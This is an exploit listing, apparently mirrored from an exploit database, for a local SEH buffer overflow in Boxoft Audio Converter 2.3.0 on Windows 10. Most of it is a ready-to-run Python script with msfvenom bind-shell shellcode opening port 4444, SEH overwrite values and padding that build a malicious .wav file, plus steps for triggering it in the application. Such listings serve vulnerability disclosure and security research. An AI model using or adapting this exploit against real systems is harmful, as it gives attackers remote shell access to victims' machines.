Share
## https://sploitus.com/exploit?id=PACKETSTORM:160166
# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)  
# Discovery by: Luis Martinez  
# Discovery Date: 2020-11-22  
# Vendor Homepage: http://www.boxoft.com/  
# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe  
# Tested Version: 2.3.0  
# Vulnerability Type: Local Buffer Overflow (SEH)  
# Tested on OS: Windows 10 Pro (10.0.18362) x64 en  
  
# Steps to Produce the Local Buffer Overflow (SEH):   
# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py  
# 2.- Open AudioConvert.exe  
# 3.- Try  
# 4.- Batch Convert Mode -> Next  
# 5.- Add  
# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open  
# 7.- Port 4444 open  
  
#!/usr/bin/env python  
#-*-coding: utf-8-*-  
  
#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c  
  
shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"  
"\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c"  
"\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2"  
"\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91"  
"\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64"  
"\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d"  
"\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f"  
"\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0"  
"\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f"  
"\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72"  
"\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a"  
"\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b"  
"\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65"  
"\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59"  
"\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf"  
"\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e"  
"\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1"  
"\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48"  
"\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62"  
"\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51"  
"\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64"  
"\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6"  
"\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7"  
"\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e")  
  
nSEH = "\xeb\x06\x90\x90"  
SEH = "\xB8\x68\x40\x00" #AudioConvert.exe  
  
buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode  
f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w")  
f.write(buffer)  
f.close()